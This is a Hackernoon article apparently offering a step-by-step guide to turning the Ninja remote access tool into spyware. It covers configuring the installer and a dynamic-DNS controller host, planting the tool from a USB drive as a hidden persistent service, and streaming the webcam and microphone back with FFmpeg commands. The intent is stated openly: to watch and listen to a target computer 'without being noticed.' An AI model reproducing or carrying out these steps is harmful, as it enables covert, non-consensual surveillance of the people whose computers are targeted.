Hackernoon logoHow to Hack a PC's Webcam and Mic using Ninja as Spyware by@eraz7

How to Hack a PC's Webcam and Mic using Ninja as Spyware

Ninja is a general-purpose fully customizable software to control a remote computer behind any NAT, Firewall, and proxy. This means you can literally do anything on a. remote computer that has Ninja running on it. All you need is to install Ninja as a service to make sure it will always be running and will start at startup. To record webcam and mic, you'll also need to add FFmpeg to Ninja. The only mandatory config is to set hostname and port. The Ninja will use these to communicate with the controller computer.
image
Erfan Azary (ErAz7) Hacker Noon profile picture

Erfan Azary (ErAz7)

Interested in computer networks. Enjoy coding in JS (React/Redux, node.js) and creating simple yet unique apps

In this article, I'll show you how to watch any computer webcam and listen to the mic (live) using the Ninja remote access tool as your highly skilled spy!

All you need is to set up Ninja on a USB and take 10 seconds to insert it to the target computer, click on Ninja installer (will take 1 second to install), and done! Now you can watch webcam and screen, listen to the mic and audio output and literally do anything on the target computer from anywhere.

So, What's Ninja?

A general-purpose fully customizable software to control a remote computer behind any NAT, Firewall, and proxy. Providing secure shell access, file transfer, and shell stream (stream shell output from remote to a local file)

This means you can literally do anything on a remote computer that has Ninja running on it. So why not use it as spyware! You can gain full control of the computer without even being noticed. All you need is to install Ninja as a service to make sure it will always be running and will start at startup

The first step, Download Ninja

So first we should download, extract and configure Ninja, you can download a single-click Ninja installer for windows (with FFmpeg included) from here :

Ninja single click windows installer (+ FFmpeg)
(large size is because of FFmpeg)

Note that this installer will install Ninja in 

C:/Ninja
 and name the service 
Ninja.exe
. To customize this, you can change the installation config file in 
config/installation-config.json
 :

{
    // directory to host service files
    "destDir": "C:/Ninja",

    // name of service
    "name": "Ninja.exe",

    // service description
    "description": "Ninja",

    // name of entry point file of your script inside /files
    "serviceFile": "ninja-v1.0.0-win.exe"
}

(This installer uses Servicifier, you can use it to install anything as a service)

Note that Ninja also works on other platforms but I've not created a fast installer for them yet (maybe later). You can download them from here (Ninja releases) and manually install them as service on target. To record webcam and mic, you'll also need to add FFmpeg, this can be done in one of these ways:

  • including FFmpeg files directly beside Ninja files (like what I've done for the installer above)
  • after you remotely connected to Ninja from the controller computer, order Ninja to download it on target
  • download FFmpeg on the controller computer and upload them to Ninja to place them on the target computer

Configure it

The only mandatory config is to set hostname and port. The Ninja will use these to communicate with the controller computer. You can find this configuration in

files/config/constants.json
in installer folder (if you don't use the single-click installer, it will be in
config/constants.json
)

also better set a name for Ninja to identify it in case you have several Ninjas

{
    // Connection port
    "PORTS": {
        "DATA": 443
    },

    // Controller computer's hostname
    "HOST": "controller.com", 

    // name to identify Ninja on controller when working with multiple Ninjas
    "NAME": "Ninja Name",

    // ...
}

(You can find the full Ninja config file here)

The important point is to use a stable hostname, of course, you can use your ip address, but since it's dynamic (unless you have purchased a static one), and will change. So the Ninja won't be able to communicate with the controller computer anymore.

Setup A Hostname

There are few ways to get a stable hostname:

  • Use a Dynamic DNS (DDNS): you can get a DDNS hostname easily and for free from services like No-IP and DuckDNS
  • Use a VPS: you can purchase a VPS and use its IP address or hostname
  • Use a Static IP
  • Use a Domain Name

So the first option (DDNS) is the best I can offer, it's free and easy. The next three options are all paid. Also, the VPS option has the downside that you'll have to always use it to control your Ninja. Here we'll use first option, so let's set it up!

Get A DDNS Hostname

You can use free dynamic DNS services like No-IP and DuckDNS to get a hostname. It's very easy and straightforward. All you need is to create an account, create a hostname and set your network's (controller computer network's) IP address as its IP. To find your IP address, you can simply search

my IP
in google (on controller computer with no VPN)

It might be annoying to find your IP address, open the DDNS provider website and set it on your hostname every time your IP changes. That's why DUCs (Dynamic Update Client) exist. You can download a DUC, install it on your (controller) computer and it will update your hostname with your IP whenever it changes. No-IP has its own DUC, not sure about DuckDNS

Alright, if you got the hostname and set it in the Ninja config file, it's time to meet an Elite Ninja (Jonin)

Download Jonin

Ninja will be your spy on the remote computer but you'll need some commander to communicate with and command the Ninja. That's where Jonin (meaning elite Ninja!) comes in

So first, you'll need to download and extract Jonin on the controller computer: Download Jonin

Then open the config file in

config/constants.json
and change the port to match with Ninja's port

{
    // connection port
    "PORTS": {
        "DATA": 443
    },

    //....
}

The Jonin computer should have the communication port open, so you should forward the port on your router. There are many guides on the web, this one from No-IP is a nice one

Also if your ISP uses some NAT, you should ask them to change your NAT type, rather change it to open (note that this NAT type is less secure than others, not a big deal though), in order to let incoming packets (Ninja messages in this case) into your network

Install Ninja On Target

Now that everything is set up, it's time to sneak!

Copy all files of the extracted and configured Ninja installer into a USB drive. All you need after is 10 seconds to install it on target. Once you got it, insert a USB drive, click on Servicifier executable (better run as administrator), click on

Yes
when prompted to
allow the app to make changes

and that's it! now you can go back to your computer and ask Jonin to command your Ninja(s)!

Record Webcam and Mic

Now that your Ninja has sneaked into the target, let the hacking begin!

First, open Jonin, press any key until you arrive on the console. Then type:

  • list
    to get a list of your Ninjas (only one in this case)
  • connect 1
    , to connect to Ninja 1
  • change
    and then
    cmd
    to switch to secure shell access
image
image
image

Now type this command to list all DirectShow devices:

FFmpeg\bin\ffmpeg -list_devices true -f dshow -i dummy 

Find camera and mic devices in the list:

image

Finally, type

change
and then
cmd-stream
to switch to shell stream command type. Finally, type this command which will stream camera and mic into
G:/cam.mkv
and any error will go into
G:/cam-err.txt
. After running this command, you'll see file names with data size streamed to each (you can press
Esc
to end stream):

@FFmpeg\bin\ffmpeg -f dshow -i video="Lenovo EasyCamera":audio="Microphone Array (2- Realtek High Definition Audio)" -f matroska [email protected]:/[email protected]:/[email protected]
image

You see I have 7 MB of video streamed into

G:/cam.mkv
. And that's it! You can now watch Ninja's webcam any time without being noticed

Ninjas can do MUCH MORE

This was just one simple functionality of Ninja. You can do almost unlimited things after you placed your Ninja on a computer

You can find full usage instructions here:

Jonin's Usage Guide

Repositories:

Feel free to ask any questions, I'll be happy to help. Also, let me know if you have any suggestion

Thanks for reading

Erfan Azary (ErAz7) Hacker Noon profile picture
by Erfan Azary (ErAz7) @eraz7. Interested in computer networks. Enjoy coding in JS (React/Redux, node.js) and creating simple yet unique appsRead my stories

Tags

Join Hacker Noon

Create your free account to unlock your custom reading experience.